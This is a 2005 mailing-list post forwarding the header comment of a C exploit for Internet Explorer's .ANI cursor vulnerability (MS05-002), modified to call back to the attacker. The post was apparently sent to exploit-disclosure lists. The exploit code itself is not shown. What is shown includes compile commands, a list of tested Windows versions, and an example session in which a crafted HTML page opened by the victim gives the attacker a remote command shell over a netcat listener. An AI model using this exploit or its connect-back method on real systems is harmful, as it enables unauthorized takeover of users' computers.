Fwd: MS05-002 xploit modification - connectback addition

From: Benn Goldman Rivers (benoror_at_gmail.com)
Date: 01/30/05


Date: Sun, 30 Jan 2005 04:59:13 -0600
To: exploits@k-otik.com, contributor@idefense.com, submissions@packetstormsecurity.org, RazaMexicanaVulnList <vuln@raza-mexicana.org>, vuln-dev@securityfocus.com


Filename with greetings ... sorry

On Sun, 30 Jan 2005 00:41:16 -0600, <benoror@gmail.com> wrote:
> /* WC-ms05002-ani-expl-cb.c: 2005-01-30: PUBLIC v.0.2
> *
> * Copyright (c) 2004-2005 WhiskyCoders.
> *
> * (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
> * (CAN-2004-1049)
> *
> * WhiskyCoders - http://bennupg.ath.cx
> * Greetz: nitrous, kubaner, cryogen, rowter, dex, beck, and everyone else in the vulnfact.com crew
> *
> * (universal -- for all affected systems)
> * ---------------------------------------------------------------------
> * Notes:
> * This is a mod of houseofdabus (HOD-ms05002-ani-expl.c) exploit.
> * http://www.k-otik.com/exploits/20050123.HOD-ms05002-ani-expl.c.php
> * ---------------------------------------------------------------------
> * Description:
> * A remote code execution vulnerability exists in the way that
> * cursor, animated cursor, and icon formats are handled. An attacker
> * could try to exploit the vulnerability by constructing a malicious
> * cursor or icon file that could potentially allow remote code
> * execution if a user visited a malicious Web site or viewed a
> * malicious e-mail message. An attacker who successfully exploited
> * this vulnerability could take complete control of an affected
> * system.
> *
> * ---------------------------------------------------------------------
> * Patch:
> * http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
> *
> * ---------------------------------------------------------------------
> * Tested on:
> * - Windows Server 2003
> * - Windows XP SP1
> * - Windows XP SP0
> * - Windows 2000 SP4
> * - Windows 2000 SP3
> * - Windows 2000 SP2
> *
> * ---------------------------------------------------------------------
> * Compile:
> *
> * Win32/VC++ : cl -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
> * Win32/cygwin: gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
> * Linux : gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
> *
> * ---------------------------------------------------------------------
> * Example:
> *
> **ATTACKER:
> *
> * d00d@whiskybox $ WC-ms05002-ani-expl-cb poc 7778 192.168.0.30
> * <...>
> * [*] Creating poc.ani file ... Ok
> * [*] Creating poc.html file ... Ok
> *
> * d00d@whiskybox $ netcat -l -p 7778 -v
> *
> **VICTIM:
> *
> * C:\> iexplore C:\poc.html
> *
> **ATTACKER:
> * d00d@whiskybox $ netcat -l -p 7778 -v
> * Microsoft Windows 2000 [Version 5.00.2195]
> * (C) Copyright 1985-2000 Microsoft Corp.
> *
> * C:\Documents and Settings\Administrator\Desktop>
> *
> * ---------------------------------------------------------------------
> *
> * This is provided as proof-of-concept code only for educational
> * purposes and testing by authorized individuals with permission to
> * do so.
> *
> */
>
>
>